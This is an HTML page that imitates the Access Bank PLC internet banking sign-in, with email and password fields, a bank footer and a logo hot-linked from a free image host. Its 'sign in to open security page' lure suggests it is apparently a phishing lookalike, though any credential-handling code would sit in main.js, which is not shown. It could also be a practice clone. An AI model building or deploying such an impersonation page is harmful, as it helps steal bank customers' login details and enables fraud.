<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  

  <title>Access Bank</title>
  
  <!-- HTML -->
  

  <!-- Custom Styles -->
  <link rel="stylesheet" type="text/css" href="style.css">
  
    <img src="https://i.ibb.co/HNkvxLw/Access-PBank-PLC-10.png"></img>
</head>

<body>
  <div class="heading" >
    <h2> Welcome to Access Bank Internet Banking </h2>
  </div>
  
  
  <div class="sub">
  <p> Sign in with your Internet Banking details or Access More login details to open security page… </p>
    </div></br>
    <br>
  
  <div class="inputs">
   <input type="text" name="username" style="width: 300px; height: 60px;" placeholder="Email address"></input></br>
   <br>
    <input type="text" name="password" style="width: 300px; height: 60px;" placeholder="Password"></br>
    
    </div>  </br>
 
    <div class=" button">
    
   <button type="submit" name="Login"
   value="submit" >Sign in</button> </br>
      </div>
       <br>
        
    <div class="bottom">
      <h5> @2024 Access Bank PLC. (Licensed by the Central Bank of Nigeria)  </h5>
 
      </div>
  
  
  <!-- Project -->
  <script src="main.js"></script>
</body>
</html>